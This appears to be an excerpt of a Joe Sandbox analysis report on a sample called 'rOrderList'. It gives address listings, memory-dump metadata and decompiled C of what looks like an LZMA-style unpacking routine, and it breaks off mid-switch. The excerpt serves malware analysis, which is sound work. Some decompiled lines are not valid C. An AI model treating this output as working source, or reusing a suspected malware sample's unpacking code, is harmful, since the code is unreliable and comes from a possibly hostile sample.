                                                                                      0x004072b7
                                                                                      0x004072ba
                                                                                      0x004072c4
                                                                                      0x004072c7
                                                                                      0x004072c7
                                                                                      0x00000000
                                                                                      0x004072c7
                                                                                      0x00407297
                                                                                      0x0040729a
                                                                                      0x0040729e
                                                                                      0x004072a1
                                                                                      0x004072a1
                                                                                      0x004072a4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040734e
                                                                                      0x00407352
                                                                                      0x00407370
                                                                                      0x00407370
                                                                                      0x00407370
                                                                                      0x00407377
                                                                                      0x0040737e
                                                                                      0x00407385
                                                                                      0x00407385
                                                                                      0x00000000
                                                                                      0x00407385
                                                                                      0x00407354
                                                                                      0x00407357
                                                                                      0x0040735a
                                                                                      0x0040735d
                                                                                      0x00407364
                                                                                      0x004072a8
                                                                                      0x004072a8
                                                                                      0x004072ab
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040743f
                                                                                      0x00407442
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407079
                                                                                      0x0040707b
                                                                                      0x00407082
                                                                                      0x00407083
                                                                                      0x00407085
                                                                                      0x00407088
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407090
                                                                                      0x00407093
                                                                                      0x00407096
                                                                                      0x00407098
                                                                                      0x0040709a
                                                                                      0x0040709a
                                                                                      0x0040709b
                                                                                      0x0040709e
                                                                                      0x004070a5
                                                                                      0x004070a8
                                                                                      0x004070b6
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040738c
                                                                                      0x0040738c
                                                                                      0x0040738f
                                                                                      0x00407396
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040739b
                                                                                      0x0040739b
                                                                                      0x0040739f
                                                                                      0x004074d7
                                                                                      0x00000000
                                                                                      0x004074d7
                                                                                      0x004073a5
                                                                                      0x004073a8
                                                                                      0x004073ab
                                                                                      0x004073af
                                                                                      0x004073b2
                                                                                      0x004073b8
                                                                                      0x004073ba
                                                                                      0x004073ba
                                                                                      0x004073ba
                                                                                      0x004073bd
                                                                                      0x004073c0
                                                                                      0x004073c0
                                                                                      0x004073c0
                                                                                      0x004073c0
                                                                                      0x004073c3
                                                                                      0x004073c3
                                                                                      0x004073c7
                                                                                      0x00407427
                                                                                      0x0040742a
                                                                                      0x0040742f
                                                                                      0x00407430
                                                                                      0x00407432
                                                                                      0x00407434
                                                                                      0x00407437
                                                                                      0x00407343
                                                                                      0x00407343
                                                                                      0x00000000
                                                                                      0x00407343
                                                                                      0x004073c9
                                                                                      0x004073cf
                                                                                      0x004073d2
                                                                                      0x004073d5
                                                                                      0x004073d8
                                                                                      0x004073db
                                                                                      0x004073de
                                                                                      0x004073e1
                                                                                      0x004073e4
                                                                                      0x004073e7
                                                                                      0x004073ea
                                                                                      0x00407403
                                                                                      0x00407406
                                                                                      0x00407409
                                                                                      0x0040740c
                                                                                      0x00407410
                                                                                      0x00407412
                                                                                      0x00407412
                                                                                      0x00407413
                                                                                      0x00407416
                                                                                      0x004073ec
                                                                                      0x004073ec
                                                                                      0x004073f4
                                                                                      0x004073f9
                                                                                      0x004073fb
                                                                                      0x004073fe
                                                                                      0x004073fe
                                                                                      0x00407419
                                                                                      0x00407420
                                                                                      0x00000000
                                                                                      0x00407422
                                                                                      0x00000000
                                                                                      0x00407422
                                                                                      0x00000000
                                                                                      0x004070be
                                                                                      0x004070c1
                                                                                      0x004070f7
                                                                                      0x00407227
                                                                                      0x00407227
                                                                                      0x00407227
                                                                                      0x00407227
                                                                                      0x0040722a
                                                                                      0x0040722a
                                                                                      0x0040722d
                                                                                      0x0040722f
                                                                                      0x004074b9
                                                                                      0x00000000
                                                                                      0x004074b9
                                                                                      0x00407235
                                                                                      0x00407238
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040723e
                                                                                      0x00407242
                                                                                      0x00407245
                                                                                      0x00407245
                                                                                      0x00407245
                                                                                      0x00000000
                                                                                      0x00407245
                                                                                      0x004070c3
                                                                                      0x004070c5
                                                                                      0x004070c7
                                                                                      0x004070c9
                                                                                      0x004070cc
                                                                                      0x004070cd
                                                                                      0x004070cf
                                                                                      0x004070d1
                                                                                      0x004070d4
                                                                                      0x004070d7
                                                                                      0x004070ed
                                                                                      0x004070f2
                                                                                      0x0040712a
                                                                                      0x0040712a
                                                                                      0x0040712e
                                                                                      0x0040715a
                                                                                      0x0040715c
                                                                                      0x00407163
                                                                                      0x00407166
                                                                                      0x00407169
                                                                                      0x00407169
                                                                                      0x0040716e
                                                                                      0x0040716e
                                                                                      0x00407170
                                                                                      0x00407173
                                                                                      0x0040717a
                                                                                      0x0040717d
                                                                                      0x004071aa
                                                                                      0x004071aa
                                                                                      0x004071ad
                                                                                      0x004071b0
                                                                                      0x00407224
                                                                                      0x00407224
                                                                                      0x00407224
                                                                                      0x00000000
                                                                                      0x00407224
                                                                                      0x004071b2
                                                                                      0x004071b8
                                                                                      0x004071bb
                                                                                      0x004071be
                                                                                      0x004071c1
                                                                                      0x004071c4
                                                                                      0x004071c7
                                                                                      0x004071ca
                                                                                      0x004071cd
                                                                                      0x004071d0
                                                                                      0x004071d3
                                                                                      0x004071ec
                                                                                      0x004071ee
                                                                                      0x004071f1
                                                                                      0x004071f2
                                                                                      0x004071f5
                                                                                      0x004071f7
                                                                                      0x004071fa
                                                                                      0x004071fc
                                                                                      0x004071fe
                                                                                      0x00407201
                                                                                      0x00407203
                                                                                      0x00407206
                                                                                      0x0040720a
                                                                                      0x0040720c
                                                                                      0x0040720c
                                                                                      0x0040720d
                                                                                      0x00407210
                                                                                      0x00407213
                                                                                      0x004071d5
                                                                                      0x004071d5
                                                                                      0x004071dd
                                                                                      0x004071e2
                                                                                      0x004071e4
                                                                                      0x004071e7
                                                                                      0x004071e7
                                                                                      0x00407216
                                                                                      0x0040721d
                                                                                      0x004071a7
                                                                                      0x004071a7
                                                                                      0x004071a7
                                                                                      0x004071a7
                                                                                      0x00000000
                                                                                      0x0040721f
                                                                                      0x00000000
                                                                                      0x0040721f
                                                                                      0x0040721d
                                                                                      0x00407130
                                                                                      0x00407133
                                                                                      0x00407135
                                                                                      0x00407138
                                                                                      0x0040713b
                                                                                      0x0040713e
                                                                                      0x00407140
                                                                                      0x00407143
                                                                                      0x00407146
                                                                                      0x00407146
                                                                                      0x00407149
                                                                                      0x00407149
                                                                                      0x0040714c
                                                                                      0x00407153
                                                                                      0x00407127
                                                                                      0x00407127
                                                                                      0x00407127
                                                                                      0x00407127
                                                                                      0x00000000
                                                                                      0x00407155
                                                                                      0x00000000
                                                                                      0x00407155
                                                                                      0x00407153
                                                                                      0x004070d9
                                                                                      0x004070dc
                                                                                      0x004070de
                                                                                      0x004070e1
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406e40
                                                                                      0x00406e40
                                                                                      0x00406e44
                                                                                      0x00407489
                                                                                      0x00000000
                                                                                      0x00407489
                                                                                      0x00406e4a
                                                                                      0x00406e4d
                                                                                      0x00406e50
                                                                                      0x00406e53
                                                                                      0x00406e56
                                                                                      0x00406e59
                                                                                      0x00406e5c
                                                                                      0x00406e5e
                                                                                      0x00406e61
                                                                                      0x00406e64
                                                                                      0x00406e67
                                                                                      0x00406e69
                                                                                      0x00406e69
                                                                                      0x00406e69
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406fcb
                                                                                      0x00406fcb
                                                                                      0x00406fcf
                                                                                      0x00407495
                                                                                      0x00000000
                                                                                      0x00407495
                                                                                      0x00406fd5
                                                                                      0x00406fd8
                                                                                      0x00406fdb
                                                                                      0x00406fde
                                                                                      0x00406fe0
                                                                                      0x00406fe0
                                                                                      0x00406fe0
                                                                                      0x00406fe3
                                                                                      0x00406fe6
                                                                                      0x00406fe9
                                                                                      0x00406fec
                                                                                      0x00406fef
                                                                                      0x00406ff2
                                                                                      0x00406ff3
                                                                                      0x00406ff5
                                                                                      0x00406ff5
                                                                                      0x00406ff5
                                                                                      0x00406ff8
                                                                                      0x00406ffb
                                                                                      0x00406ffe
                                                                                      0x00407001
                                                                                      0x00407001
                                                                                      0x00407001
                                                                                      0x00407004
                                                                                      0x00407006
                                                                                      0x00407006
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407248
                                                                                      0x00407248
                                                                                      0x00407248
                                                                                      0x0040724c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407252
                                                                                      0x00407255
                                                                                      0x00407258
                                                                                      0x0040725b
                                                                                      0x0040725d
                                                                                      0x0040725d
                                                                                      0x0040725d
                                                                                      0x00407260
                                                                                      0x00407263
                                                                                      0x00407266
                                                                                      0x00407269
                                                                                      0x0040726c
                                                                                      0x0040726f
                                                                                      0x00407270
                                                                                      0x00407272
                                                                                      0x00407272
                                                                                      0x00407272
                                                                                      0x00407275
                                                                                      0x00407278
                                                                                      0x0040727b
                                                                                      0x0040727e
                                                                                      0x00407281
                                                                                      0x00407285
                                                                                      0x00407287
                                                                                      0x0040728a
                                                                                      0x00000000
                                                                                      0x0040728c
                                                                                      0x00407009
                                                                                      0x00407009
                                                                                      0x00000000
                                                                                      0x00407009
                                                                                      0x0040728a
                                                                                      0x004074bf
                                                                                      0x004074e1
                                                                                      0x004074e7
                                                                                      0x004074e9
                                                                                      0x004074f0
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406aee
                                                                                      0x004074f6
                                                                                      0x004074f6
                                                                                      0x00000000

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d02973cee569c5a87d0209c7eb585da92a748f7851f7d1800b7639c908389217
                                                                                      • Instruction ID: 835433ef786a7bbaa66b5d31b28c9fa354c7a4a33243279710ed11147b04f42a
                                                                                      • Opcode Fuzzy Hash: d02973cee569c5a87d0209c7eb585da92a748f7851f7d1800b7639c908389217
                                                                                      • Instruction Fuzzy Hash: F1816871D04228CBDF24CFA8C844BAEBBB0FF44305F11816AD856BB281D7786986DF45
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 98%
                                                                                      			E00406EFA() {
                                                                                      				signed int _t539;
                                                                                      				unsigned short _t540;
                                                                                      				signed int _t541;
                                                                                      				void _t542;
                                                                                      				signed int _t543;
                                                                                      				signed int _t544;
                                                                                      				signed int _t573;
                                                                                      				signed int _t576;
                                                                                      				signed int _t597;
                                                                                      				signed int* _t614;
                                                                                      				void* _t621;
                                                                                      
                                                                                      				L0:
                                                                                      				while(1) {
                                                                                      					L0:
                                                                                      					if( *(_t621 - 0x40) != 1) {
                                                                                      						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                                                                                      						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                                                                                      						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                                                                                      						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                                                                                      						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                                                                                      						_t539 =  *(_t621 - 4) + 0x664;
                                                                                      						 *(_t621 - 0x58) = _t539;
                                                                                      						goto L68;
                                                                                      					} else {
                                                                                      						 *(__ebp - 0x84) = 8;
                                                                                      						while(1) {
                                                                                      							L132:
                                                                                      							 *(_t621 - 0x54) = _t614;
                                                                                      							while(1) {
                                                                                      								L133:
                                                                                      								_t540 =  *_t614;
                                                                                      								_t597 = _t540 & 0x0000ffff;
                                                                                      								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                                                      								if( *(_t621 - 0xc) >= _t573) {
                                                                                      									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                                                      									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                                                      									 *(_t621 - 0x40) = 1;
                                                                                      									_t541 = _t540 - (_t540 >> 5);
                                                                                      									 *_t614 = _t541;
                                                                                      								} else {
                                                                                      									 *(_t621 - 0x10) = _t573;
                                                                                      									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                      									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                                                      								}
                                                                                      								if( *(_t621 - 0x10) >= 0x1000000) {
                                                                                      									goto L139;
                                                                                      								}
                                                                                      								L137:
                                                                                      								if( *(_t621 - 0x6c) == 0) {
                                                                                      									 *(_t621 - 0x88) = 5;
                                                                                      									L170:
                                                                                      									_t576 = 0x22;
                                                                                      									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                                                                                      									_t544 = 0;
                                                                                      									L172:
                                                                                      									return _t544;
                                                                                      								}
                                                                                      								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                                                                                      								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                      								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                      								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                                                      								L139:
                                                                                      								_t542 =  *(_t621 - 0x84);
                                                                                      								while(1) {
                                                                                      									 *(_t621 - 0x88) = _t542;
                                                                                      									while(1) {
                                                                                      										L1:
                                                                                      										_t543 =  *(_t621 - 0x88);
                                                                                      										if(_t543 > 0x1c) {
                                                                                      											break;
                                                                                      										}
                                                                                      										switch( *((intOrPtr*)(_t543 * 4 +  &M004074FE))) {
                                                                                      											case 0:
                                                                                      												if( *(_t621 - 0x6c) == 0) {
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                      												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                      												_t543 =  *( *(_t621 - 0x70));
                                                                                      												if(_t543 > 0xe1) {
                                                                                      													goto L171;
                                                                                      												}
                                                                                      												_t547 = _t543 & 0x000000ff;
                                                                                      												_push(0x2d);
                                                                                      												asm("cdq");
                                                                                      												_pop(_t578);
                                                                                      												_push(9);
                                                                                      												_pop(_t579);
                                                                                      												_t617 = _t547 / _t578;
                                                                                      												_t549 = _t547 % _t578 & 0x000000ff;
                                                                                      												asm("cdq");
                                                                                      												_t612 = _t549 % _t579 & 0x000000ff;
                                                                                      												 *(_t621 - 0x3c) = _t612;
                                                                                      												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                                                                                      												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                                                                                      												_t620 = (0x300 << _t612 + _t617) + 0x736;
                                                                                      												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                                                                                      													L10:
                                                                                      													if(_t620 == 0) {
                                                                                      														L12:
                                                                                      														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                                                                                      														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                      														goto L15;
                                                                                      													} else {
                                                                                      														goto L11;
                                                                                      													}
                                                                                      													do {
                                                                                      														L11:
                                                                                      														_t620 = _t620 - 1;
                                                                                      														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                                                                                      													} while (_t620 != 0);
                                                                                      													goto L12;
                                                                                      												}
                                                                                      												if( *(_t621 - 4) != 0) {
                                                                                      													GlobalFree( *(_t621 - 4));
                                                                                      												}
                                                                                      												_t543 = GlobalAlloc(0x40, 0x600); // executed
                                                                                      												 *(_t621 - 4) = _t543;
                                                                                      												if(_t543 == 0) {
                                                                                      													goto L171;
                                                                                      												} else {
                                                                                      													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                                                                                      													goto L10;
                                                                                      												}
                                                                                      											case 1:
                                                                                      												L13:
                                                                                      												__eflags =  *(_t621 - 0x6c);
                                                                                      												if( *(_t621 - 0x6c) == 0) {
                                                                                      													 *(_t621 - 0x88) = 1;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                      												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                                                                                      												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                      												_t45 = _t621 - 0x48;
                                                                                      												 *_t45 =  *(_t621 - 0x48) + 1;
                                                                                      												__eflags =  *_t45;
                                                                                      												L15:
                                                                                      												if( *(_t621 - 0x48) < 4) {
                                                                                      													goto L13;
                                                                                      												}
                                                                                      												_t555 =  *(_t621 - 0x40);
                                                                                      												if(_t555 ==  *(_t621 - 0x74)) {
                                                                                      													L20:
                                                                                      													 *(_t621 - 0x48) = 5;
                                                                                      													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                                                                                      													goto L23;
                                                                                      												}
                                                                                      												 *(_t621 - 0x74) = _t555;
                                                                                      												if( *(_t621 - 8) != 0) {
                                                                                      													GlobalFree( *(_t621 - 8));
                                                                                      												}
                                                                                      												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                                                                                      												 *(_t621 - 8) = _t543;
                                                                                      												if(_t543 == 0) {
                                                                                      													goto L171;
                                                                                      												} else {
                                                                                      													goto L20;
                                                                                      												}
                                                                                      											case 2:
                                                                                      												L24:
                                                                                      												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                                                                                      												 *(_t621 - 0x84) = 6;
                                                                                      												 *(_t621 - 0x4c) = _t562;
                                                                                      												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                                                                                      												goto L132;
                                                                                      											case 3:
                                                                                      												L21:
                                                                                      												__eflags =  *(_t621 - 0x6c);
                                                                                      												if( *(_t621 - 0x6c) == 0) {
                                                                                      													 *(_t621 - 0x88) = 3;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                      												_t67 = _t621 - 0x70;
                                                                                      												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                                                                                      												__eflags =  *_t67;
                                                                                      												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                                                      												L23:
                                                                                      												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                                                                                      												if( *(_t621 - 0x48) != 0) {
                                                                                      													goto L21;
                                                                                      												}
                                                                                      												goto L24;
                                                                                      											case 4:
                                                                                      												L133:
                                                                                      												_t540 =  *_t614;
                                                                                      												_t597 = _t540 & 0x0000ffff;
                                                                                      												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                                                      												if( *(_t621 - 0xc) >= _t573) {
                                                                                      													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                                                      													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                                                      													 *(_t621 - 0x40) = 1;
                                                                                      													_t541 = _t540 - (_t540 >> 5);
                                                                                      													 *_t614 = _t541;
                                                                                      												} else {
                                                                                      													 *(_t621 - 0x10) = _t573;
                                                                                      													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                      													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                                                      												}
                                                                                      												if( *(_t621 - 0x10) >= 0x1000000) {
                                                                                      													goto L139;
                                                                                      												}
                                                                                      											case 5:
                                                                                      												goto L137;
                                                                                      											case 6:
                                                                                      												__edx = 0;
                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                      													__eax =  *(__ebp - 4);
                                                                                      													__ecx =  *(__ebp - 0x38);
                                                                                      													 *(__ebp - 0x34) = 1;
                                                                                      													 *(__ebp - 0x84) = 7;
                                                                                      													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                      													L132:
                                                                                      													 *(_t621 - 0x54) = _t614;
                                                                                      													goto L133;
                                                                                      												}
                                                                                      												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                      												__esi =  *(__ebp - 0x60);
                                                                                      												__cl = 8;
                                                                                      												__cl = 8 -  *(__ebp - 0x3c);
                                                                                      												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                      												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                      												__ecx =  *(__ebp - 0x3c);
                                                                                      												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                      												__ecx =  *(__ebp - 4);
                                                                                      												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                      												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                      												__eflags =  *(__ebp - 0x38) - 4;
                                                                                      												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                      												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                      												if( *(__ebp - 0x38) >= 4) {
                                                                                      													__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                      													if( *(__ebp - 0x38) >= 0xa) {
                                                                                      														_t98 = __ebp - 0x38;
                                                                                      														 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                      														__eflags =  *_t98;
                                                                                      													} else {
                                                                                      														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                      													}
                                                                                      												} else {
                                                                                      													 *(__ebp - 0x38) = 0;
                                                                                      												}
                                                                                      												__eflags =  *(__ebp - 0x34) - __edx;
                                                                                      												if( *(__ebp - 0x34) == __edx) {
                                                                                      													__ebx = 0;
                                                                                      													__ebx = 1;
                                                                                      													goto L61;
                                                                                      												} else {
                                                                                      													__eax =  *(__ebp - 0x14);
                                                                                      													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                      													__eflags = __eax -  *(__ebp - 0x74);
                                                                                      													if(__eax >=  *(__ebp - 0x74)) {
                                                                                      														__eax = __eax +  *(__ebp - 0x74);
                                                                                      														__eflags = __eax;
                                                                                      													}
                                                                                      													__ecx =  *(__ebp - 8);
                                                                                      													__ebx = 0;
                                                                                      													__ebx = 1;
                                                                                      													__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                      													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                      													goto L41;
                                                                                      												}
                                                                                      											case 7:
                                                                                      												goto L0;
                                                                                      											case 8:
                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                      													__eax =  *(__ebp - 4);
                                                                                      													__ecx =  *(__ebp - 0x38);
                                                                                      													 *(__ebp - 0x84) = 0xa;
                                                                                      													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                      												} else {
                                                                                      													__eax =  *(__ebp - 0x38);
                                                                                      													__ecx =  *(__ebp - 4);
                                                                                      													__eax =  *(__ebp - 0x38) + 0xf;
                                                                                      													 *(__ebp - 0x84) = 9;
                                                                                      													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                      													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                      												}
                                                                                      												while(1) {
                                                                                      													L132:
                                                                                      													 *(_t621 - 0x54) = _t614;
                                                                                      													goto L133;
                                                                                      												}
                                                                                      											case 9:
                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                      													goto L89;
                                                                                      												}
                                                                                      												__eflags =  *(__ebp - 0x60);
                                                                                      												if( *(__ebp - 0x60) == 0) {
                                                                                      													goto L171;
                                                                                      												}
                                                                                      												__eax = 0;
                                                                                      												__eflags =  *(__ebp - 0x38) - 7;
                                                                                      												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                      												__eflags = _t258;
                                                                                      												0 | _t258 = _t258 + _t258 + 9;
                                                                                      												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                      												goto L75;
                                                                                      											case 0xa:
                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                      													__eax =  *(__ebp - 4);
                                                                                      													__ecx =  *(__ebp - 0x38);
                                                                                      													 *(__ebp - 0x84) = 0xb;
                                                                                      													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                      													while(1) {
                                                                                      														L132:
                                                                                      														 *(_t621 - 0x54) = _t614;
                                                                                      														goto L133;
                                                                                      													}
                                                                                      												}
                                                                                      												__eax =  *(__ebp - 0x28);
                                                                                      												goto L88;
                                                                                      											case 0xb:
                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                      													__ecx =  *(__ebp - 0x24);
                                                                                      													__eax =  *(__ebp - 0x20);
                                                                                      													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                      												} else {
                                                                                      													__eax =  *(__ebp - 0x24);
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 0x28);
                                                                                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                      												L88:
                                                                                      												__ecx =  *(__ebp - 0x2c);
                                                                                      												 *(__ebp - 0x2c) = __eax;
                                                                                      												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                      												L89:
                                                                                      												__eax =  *(__ebp - 4);
                                                                                      												 *(__ebp - 0x80) = 0x15;
                                                                                      												__eax =  *(__ebp - 4) + 0xa68;
                                                                                      												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                      												goto L68;
                                                                                      											case 0xc:
                                                                                      												L99:
                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                      													 *(__ebp - 0x88) = 0xc;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												_t334 = __ebp - 0x70;
                                                                                      												 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                      												__eflags =  *_t334;
                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												__eax =  *(__ebp - 0x2c);
                                                                                      												goto L101;
                                                                                      											case 0xd:
                                                                                      												L37:
